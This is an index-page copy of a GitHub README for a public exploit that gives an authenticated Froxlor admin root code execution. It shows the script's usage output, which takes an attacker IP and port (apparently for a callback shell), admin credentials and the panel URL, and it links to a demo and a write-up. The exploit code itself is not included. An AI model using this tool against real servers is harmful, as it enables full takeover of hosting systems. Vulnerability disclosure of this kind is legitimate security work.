Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/sarperavci/froxlor-authenticated-root-rce-exploit


https://github.com/sarperavci/froxlor-authenticated-root-rce-exploit

Last synced: 6 days ago
JSON representation

Awesome Lists containing this project

README

        

# Froxlor Authenticated root RCE Exploit

This authenticated RCE exploit was found by me and rejected by the Froxlor team. I am releasing it now because there is no point in keeping it private if it's a feature.

For live demo, you can watch [https://github.com/sarperavci/Froxlor-Authenticated-root-RCE-Exploit/blob/main/demo.mp4](https://github.com/sarperavci/Froxlor-Authenticated-root-RCE-Exploit/blob/main/demo.mp4)

For more information, you can visit [https://sarperavci.com/Froxlor-Authenticated-RCE/](https://sarperavci.com/Froxlor-Authenticated-RCE/)

## Description

This exploit allows an authenticated admin to execute arbitrary code on the server as **root**, even the server is running as **www-data**.

## Usage

```bash
$ python3 exploit.py -h
usage: exploit.py -i 10.10.10.2 -p 12345 -u admin -P password -U http://10.10.10.10:8081

Froxlor Authenticated RCE with Root Privileges Exploit by @sarperavci

optional arguments:
-h, --help show this help message and exit
-i IP, --ip IP Attacker IP Address
-p PORT, --port PORT Attacker Port
-u USER, --user USER Froxlor Admin Username
-P PASSWORD, --password PASSWORD Froxlor Admin Password
-U URL, --url URL Base URL of the Froxlor Panel
```